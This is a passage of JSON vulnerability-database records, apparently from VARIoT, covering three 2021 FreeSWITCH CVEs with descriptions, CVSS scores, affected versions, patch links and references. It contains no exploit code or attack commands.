"id": "CVE-2021-41158"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"id": "VAR-202110-1371",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:42:17.035000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0v1.10.7\u00a0Release GitHub",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"title": "FreeSWITCH Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=168567"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-346",
"trust": 1.1
},
{
"problemtype": "information leak (CWE-200) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2021/oct/40"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-3v3f-99mv-qvj4"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41158"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164622/freeswitch-1.10.6-sip-digest-leak.html"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q4/49"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "VULMON",
"id": "CVE-2021-41158"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-402381"
},
{
"db": "VULMON",
"id": "CVE-2021-41158"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-26T00:00:00",
"db": "VULHUB",
"id": "VHN-402381"
},
{
"date": "2022-10-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"date": "2021-10-26T14:15:08.007000",
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-24T00:00:00",
"db": "VULHUB",
"id": "VHN-402381"
},
{
"date": "2022-10-03T07:29:00",
"db": "JVNDB",
"id": "JVNDB-2021-014049"
},
{
"date": "2022-10-24T16:06:20.397000",
"db": "NVD",
"id": "CVE-2021-41158"
},
{
"date": "2022-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Vulnerability regarding information leakage in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014049"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1762"
}
],
"trust": 0.6
}
}
VAR-202110-1372
Vulnerability from variot - Updated: 2023-12-18 12:26FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the auth-subscriptions parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is a vulnerability in the lack of authentication for critical features.Information may be obtained. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. There is a security vulnerability in FreeSWITCH versions 1.10.5 and earlier versions
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1372",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "freeswitch",
"version": "1.10.6"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.6"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.6",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41157"
}
]
},
"cve": "CVE-2021-41157",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-41157",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-397861",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2021-014048",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-41157",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2021-41157",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1786",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-397861",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. By default, SIP requests of the type SUBSCRIBE are not authenticated in the affected versions of FreeSWITCH. Abuse of this security issue allows attackers to subscribe to user agent event notifications without the need to authenticate. This abuse poses privacy concerns and might lead to social engineering or similar attacks. For example, attackers may be able to monitor the status of target SIP extensions. Although this issue was fixed in version v1.10.6, installations upgraded to the fixed version of FreeSWITCH from an older version, may still be vulnerable if the configuration is not updated accordingly. Software upgrades do not update the configuration by default. SIP SUBSCRIBE messages should be authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-subscriptions` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. FreeSWITCH There is a vulnerability in the lack of authentication for critical features.Information may be obtained. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications. There is a security vulnerability in FreeSWITCH versions 1.10.5 and earlier versions",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "VULMON",
"id": "CVE-2021-41157"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-41157",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "164638",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-397861",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-41157",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "VULMON",
"id": "CVE-2021-41157"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"id": "VAR-202110-1372",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-397861"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:26:40.807000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "FreeSWITCH\u00a0does\u00a0not\u00a0authenticate\u00a0SIP\u00a0SUBSCRIBE\u00a0requests\u00a0by\u00a0default",
"trust": 0.8,
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"title": "FreeSWITCH Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=167406"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.1
},
{
"problemtype": "Lack of authentication for critical features (CWE-306) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://seclists.org/fulldisclosure/2021/oct/41"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/security/advisories/ghsa-g7xg-7c54-rmpj"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/commit/b21dd4e7f3a6f1d5f7be3ea500a319a5bc11db9e"
},
{
"trust": 1.7,
"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.6"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41157"
},
{
"trust": 0.7,
"url": "https://packetstormsecurity.com/files/164638/freeswitch-1.10.5-sip-subscribe-missing-authentication.html"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "VULMON",
"id": "CVE-2021-41157"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-397861"
},
{
"db": "VULMON",
"id": "CVE-2021-41157"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-26T00:00:00",
"db": "VULHUB",
"id": "VHN-397861"
},
{
"date": "2022-10-03T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"date": "2021-10-26T14:15:07.807000",
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"date": "2021-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-08-09T00:00:00",
"db": "VULHUB",
"id": "VHN-397861"
},
{
"date": "2022-10-03T07:29:00",
"db": "JVNDB",
"id": "JVNDB-2021-014048"
},
{
"date": "2022-08-09T13:41:18.067000",
"db": "NVD",
"id": "CVE-2021-41157"
},
{
"date": "2022-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "FreeSWITCH\u00a0 Vulnerability regarding lack of authentication for critical features in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-014048"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "access control error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-1786"
}
],
"trust": 0.6
}
}
VAR-202110-0919
Vulnerability from variot - Updated: 2023-12-18 12:16An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value. SignalWire freeswitch Exists in a flaw in resource initialization.Information may be obtained. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-0919",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "freeswitch",
"scope": "lt",
"trust": 1.0,
"vendor": "signalwire",
"version": "1.10.6"
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": null
},
{
"model": "freeswitch",
"scope": "eq",
"trust": 0.8,
"vendor": "freeswitch",
"version": "1.10.6"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:signalwire:freeswitch:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.10.6",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-36513"
}
]
},
"cve": "CVE-2021-36513",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2021-36513",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-397762",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-36513",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-36513",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-1263",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-397762",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2021-36513",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "VULMON",
"id": "CVE-2021-36513"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-1263"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in function sofia_handle_sip_i_notify in sofia.c in SignalWire freeswitch before 1.10.6, may allow attackers to view sensitive information due to an uninitialized value. SignalWire freeswitch Exists in a flaw in resource initialization.Information may be obtained. FreeSWITCH is a set of free and open source communication software developed by the individual developer Anthony Minesale in the United States. The software can be used to create audio, video and short message products and applications",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-36513"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920"
},
{
"db": "VULHUB",
"id": "VHN-397762"
},
{
"db": "VULMON",
"id": "CVE-2021-36513"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-36513",
"trust": 3.4
},
{
"db": "JVNDB",
"id": "JVNDB-2021-013920",
"trust": 0.8
},
{
